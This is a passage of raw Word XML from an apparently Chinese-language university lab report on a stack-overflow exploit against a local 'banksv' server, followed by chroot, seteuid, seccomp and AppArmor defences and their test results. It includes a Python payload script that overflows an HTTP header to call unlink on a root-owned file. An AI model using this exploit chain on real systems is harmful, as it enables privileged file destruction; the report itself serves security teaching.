          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>+44</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>字节，继续溢出即可覆盖返回地址，构造如下payload：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FDF58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build_exploit(shellcode):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560EAD0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21FFAE8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ul_arg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"/tmp/test.txt\0"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3F0FC6A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ul_arg_addr = ebp_addr + 20  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1271681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581D081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req =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"POST / HTTP/1.1\r\n"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).encode(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'latin-1'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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCDEC3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req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"Host: 127.0.0.1\r\n"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).encode(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'latin-1'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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171FF50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req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"Content-Length: 58\r\n"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).encode(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'latin-1'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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B00167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req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"Origin: http://127.0.0.1\r\n"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).encode(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'latin-1'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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CF615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req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"Connection: keep-alive\r\n"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).encode(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'latin-1'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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7293DCE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req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"Referer: http://127.0.0.1/\r\n"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).encode(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'latin-1'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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E40E3F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6883A07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req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"Hacking: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).encode(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'latin-1'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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F74844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2DECAE2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req += b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'A'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* 1024 + b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* 44  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC7D5C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7402F98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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t># remove a file specified by the path "ul_arg"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66B5BFB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req += p32(ul_addr)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E380F1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req += p32(ex_addr)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DAA55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req += p32(ul_arg_addr)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AF35A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req += p32(0)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564FB07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req += ul_arg.encode(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'latin-1'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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8D33E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172B9F1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req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).encode(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'latin-1'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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB6FA2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1C9DF2C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req  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E95C5C7">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="30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当parseHeaders处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Hacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>时，读取数据部分需要到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CRLF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>才结束，而实际数据部分长度超过了栈缓冲区长度，从第6行代码处开始覆盖返回地址，通过构造栈，实现调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>unlink(“/tmp/test.txt”)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>exit(0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，利用服务器程序的root uid权限删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/tmp/test.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0C5435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为touchstone程序添加setuid root权限，并启动执行。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>目录下创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/tmp/test.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件，并将其owner改为root。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D18115F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启动服务器并测试攻击脚本，检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/tmp/test.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件状态，如图2-1所示，执行攻击脚本后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/tmp/test.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件被删除，实现了利用漏洞删除特权文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D648554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3835400" cy="2403475"/>
            <wp:effectExtent l="9525" t="9525" r="22225" b="254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40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81B4FA">
      <w:p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2-1 漏洞利用删除特权文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D45A79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chroot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A82D746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修改server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，增加chroot支持，并重新make。同时，使用代码目录中的chroot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-setup.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，改变root directory从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/jai</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>l，并在jail中启动server。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCD7239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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/jail/tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>目录与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>目录下面创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>test.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件，运行攻击脚本检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/jail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/tmp/test.txt文件与/tmp/test.txt文件，如图2-2所示，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/jail/tmp/test.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件被删除，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/tmp/test.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件仍存在，避免了攻击造成的真实路径下的文件删除。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B70497C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3750310" cy="2647315"/>
            <wp:effectExtent l="9525" t="9525" r="1206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2647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61EF8F">
      <w:p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2-2 chroot保护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0741DEEB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改变进程euid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B01426D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修改原代码，使用seteuid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(1000)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，及时减少privilege,使banksv进程没有不必要的root全新，并重新make。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2711D2B4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动服务器并测试攻击脚本，检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/tmp/test.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件状态，如图2-3所示，执行攻击脚本后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/tmp/test.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件仍存在，通过改变进程euid实现了权限降低，保护了特权文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBBCFCD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4029710" cy="2468880"/>
            <wp:effectExtent l="9525" t="9525" r="18415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2468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2258B3">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default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2-3 降低euid权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58393B79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使用seccomp限制系统调用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF48A8F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修改源代码，使用seccomp方法，对vulnerable进程进行约束，并重新make。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52974E3D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:num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默认允许，显式拒绝（Fail Securely）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423F99B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setup_allow_bydefault_rules()  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31239A4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{  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56149E5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scmp_filter_ctx ctx;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E34BA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ctx = seccomp_init(SCMP_ACT_ALLOW);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8C5EB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(ctx==NULL)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AC35A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exit(-1);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7A446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0B3120A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SCMP_ACT_KILL, SCMP_SYS(unlink), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC5DA6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26574A0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seccomp_load(ctx);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3B1A1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seccomp_release(ctx);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F6F07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}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318BF279">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="097D7330">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0"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默认拒绝，显式允许</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541AC71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setup_deny_bydefault_rules()  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7520724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{  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A8A17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scmp_filter_ctx ctx;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEAA6E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ctx = seccomp_init(SCMP_ACT_KILL);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1AF1B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(ctx==NULL)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E64C5B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exit(-1);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433BE94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3F1379E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SCMP_SYS(read), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B3285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SCMP_SYS(write), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C895E5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SCMP_SYS(openat), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2202800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SCMP_SYS(rt_sigaction), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4BA34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SCMP_SYS(socketcall), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5808C09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SCMP_SYS(clone), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D924E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SCMP_SYS(set_robust_list), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3375200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SCMP_SYS(getresuid32), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B9D19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SCMP_SYS(getcwd), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63338DB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SCMP_SYS(getpid), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEB675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SCMP_SYS(statx), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7794826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SCMP_SYS(close), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB73D2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SCMP_SYS(_llseek), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB1694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SCMP_SYS(fcntl64), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21022CC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SCMP_SYS(access), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16365EC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SCMP_SYS(brk), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DCBEA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SCMP_SYS(exit_group), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034F6CC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SCMP_SYS(fstat64), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E6558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SCMP_SYS(stat64), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4929046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seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(mkdir), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA2951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SCMP_SYS(execve), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653200D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6D9CC82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seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(unlink), 0);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B3FBC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22C57A5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seccomp_load(ctx);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A10E5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seccomp_release(ctx);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6740BE9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1140"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="210" w:lineRule="atLeast"/>
        <w:ind w:left="1096" w:leftChars="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}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2718A972">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="20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编译后允许server，使用攻击脚本测试，两种防御方式都能够组织攻击脚本调用unlink，如图2-4所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4F50AB">
      <w:pPr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4371975" cy="1122680"/>
            <wp:effectExtent l="9525" t="9525" r="1905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22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CCD717">
      <w:pPr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2-4 seccomp保护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565DC678">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="20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测试使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>system(“/bin/sh”)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取shell时发现，无论哪种策略下，都无法获取shell，进一步调试发现，即使是空策略，只要开启了seccomp，程序内都无法使用execv系统调用，测试发现seccomp在64位系统下的32位程序中存在异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1C99F3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使用AppArmor限制进程权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B120A31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="20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使用aa-genprof命令为banksv程序生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>AppArmor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>配置，修改生成的配置文件如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FACCE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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t># Last Modified: Fri Jun 14 11:23:18 2024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2435EEC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abi &lt;abi/3.0&gt;,  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B11EA1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54547E2D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include &lt;tunables/global&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FE6429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756B8A8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/home/noxke/iss-exp/lab2/task5/banksv {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013EDAF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include &lt;abstractions/base&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A35A7BD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include &lt;abstractions/apache2-common&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2100119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1F68C1C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/home/noxke/iss-exp/lab2/task5/banksv mr,  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194803E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/home/noxke/iss-exp/lab2/task5/db/user.db rwk,  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D0845E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/home/noxke/iss-exp/lab2/task5/index.html r,  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2238D5E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/tmp/test.txt r,  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570615D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4D18725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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBD2471">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="20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在配置文件中，限制banksv程序对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/tmp/test.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件只读，启用AppArmor,启动server程序，测试攻击脚本，发现未能删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/tmp/test.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件，AppArmor成功限制了banksv程序权限，保护了特权文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AAF752">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="600" w:leftChars="0" w:hanging="600" w:firstLineChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc1902270896"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验中的问题、心得和建议</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="35B41774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在本次实验中，通过利用服务器程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>bansv中存在的栈溢出漏洞，并利用服务器的setuid权限实现了删除特权文件，学习了栈溢出漏洞的利用，并且了解了不必要权限的危害，应尽可能只为进程分配实际需要的权限，降低漏洞被利用时的危害。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2898ECEB">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="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此外还通过学习使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>chroot技术实现了程序运行环境隔离，使用seteuid技术实现降低进程权限，使用seccomp、apparmor技术为进程分配必要权限，了解了在程序开发中常用的安全保护手段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B34367F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="600" w:leftChars="0" w:hanging="600" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="8" w:name="_Toc308129763"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>三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Web安全</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="79766709">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="600" w:leftChars="0" w:hanging="600" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc1223526918"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
